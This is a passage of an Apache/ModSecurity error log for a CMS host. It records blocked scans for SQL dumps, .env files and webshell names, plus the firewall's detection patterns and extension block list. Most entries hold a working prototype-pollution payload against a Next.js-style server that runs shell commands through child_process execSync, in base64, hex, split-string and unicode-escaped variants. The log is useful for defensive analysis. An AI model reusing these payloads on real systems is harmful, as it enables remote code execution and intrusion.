[id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "acgxuDY61sl6NLdDvEz5DAAAANg"] [Sat Mar 28 21:53:32.168095 2026] [:error] [pid 30494:tid 30519] [client 34.100.135.49:60605] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "acgxvDY61sl6NLdDvEz5JgAAANc"] [Sat Mar 28 21:53:35.025797 2026] [:error] [pid 30349:tid 30414] [client 34.100.135.49:64439] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "acgxv61YjzjM9ef1gxOXeAAAAEg"] [Sat Mar 28 21:53:38.403382 2026] [:error] [pid 30494:tid 30514] [client 34.100.135.49:52212] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config/db.sql"] [unique_id "acgxwjY61sl6NLdDvEz5UQAAANI"] [Sat Mar 28 21:53:41.691253 2026] [:error] [pid 16195:tid 16397] [client 34.100.135.49:56038] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/sql/db.sql"] [unique_id "acgxxfkqLRsIcucAZ6XoZgAAAQU"] [Sat Mar 28 21:53:44.931004 2026] [:error] [pid 16195:tid 16390] [client 34.100.135.49:59922] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/data/dump.sql"] [unique_id "acgxyPkqLRsIcucAZ6XoewAAAQA"] [Sat Mar 28 21:53:47.921327 2026] [:error] [pid 16195:tid 16390] [client 34.100.135.49:63789] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backups/database.sql"] [unique_id "acgxy_kqLRsIcucAZ6XokAAAAQA"] [Sat Mar 28 21:53:51.258366 2026] [:error] [pid 16195:tid 16419] [client 34.100.135.49:51622] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/mysql.sql"] [unique_id "acgxz_kqLRsIcucAZ6XooAAAARY"] [Sat Mar 28 21:53:54.724871 2026] [:error] [pid 16195:tid 16407] [client 34.100.135.49:55386] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "acgx0vkqLRsIcucAZ6XorQAAAQo"] [Mon Mar 30 21:35:05.821829 2026] [:error] [pid 9695:tid 9714] [client 20.250.5.104:3994] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 20:12:00.875789 2026] [:error] [pid 26573:tid 26605] [client 172.190.142.176:45374] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 20:12:03.989576 2026] [:error] [pid 26573:tid 26587] [client 172.190.142.176:28506] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Fri Apr 03 01:03:47.978182 2026] [:error] [pid 20309:tid 20324] [client 20.220.210.206:15756] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/pwnd.php [Fri Apr 03 01:03:51.704362 2026] [:error] [pid 20309:tid 20327] [client 20.220.210.206:15779] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/siteindex.php [Fri Apr 03 01:03:56.713838 2026] [:error] [pid 18537:tid 18552] [client 20.220.210.206:15788] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/fm.php [Fri Apr 03 15:39:13.414654 2026] [access_compat:error] [pid 5223:tid 5238] [client 18.143.163.211:50804] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Fri Apr 03 15:39:13.575146 2026] [access_compat:error] [pid 5223:tid 5245] [client 18.143.163.211:50804] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Fri Apr 03 15:39:13.732059 2026] [access_compat:error] [pid 5223:tid 5231] [client 18.143.163.211:50804] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Fri Apr 03 15:40:16.133971 2026] [:error] [pid 18547:tid 18559] [client 18.143.163.211:42758] [client 18.143.163.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "ac_DQLJf01uCe8eluSsCQAAAAYk"] [Fri Apr 03 15:40:16.289766 2026] [:error] [pid 18547:tid 18554] [client 18.143.163.211:42758] [client 18.143.163.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "ac_DQLJf01uCe8eluSsCQgAAAYQ"] [Fri Apr 03 15:40:16.452037 2026] [:error] [pid 18547:tid 18555] [client 18.143.163.211:42758] [client 18.143.163.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "ac_DQLJf01uCe8eluSsCRAAAAYU"] [Sun Apr 05 15:42:28.262575 2026] [:error] [pid 23077:tid 23104] [client 172.94.9.253:40410] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSbQAAAdU"] [Sun Apr 05 15:42:28.262666 2026] [:error] [pid 1308:tid 1368] [client 172.94.9.253:40372] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxCj-HYEhJWFlG6ErgQAAAFQ"] [Sun Apr 05 15:42:28.263119 2026] [:error] [pid 1309:tid 1379] [client 172.94.9.253:40382] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxD-XKUNJEHmNu6G7twAAAIg"] [Sun Apr 05 15:42:28.263315 2026] [:error] [pid 23077:tid 23087] [client 172.94.9.253:40400] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSbAAAAcQ"] [Sun Apr 05 15:42:28.263473 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:40438] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSbwAAAcw"] [Sun Apr 05 15:42:28.263787 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:40398] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do5AAAAQw"] [Sun Apr 05 15:42:28.268704 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:40370] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSbgAAAdY"] [Sun Apr 05 15:42:28.273948 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:40446] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQScAAAAco"] [Sun Apr 05 15:42:28.274508 2026] [:error] [pid 1308:tid 1351] [client 172.94.9.253:40452] [client 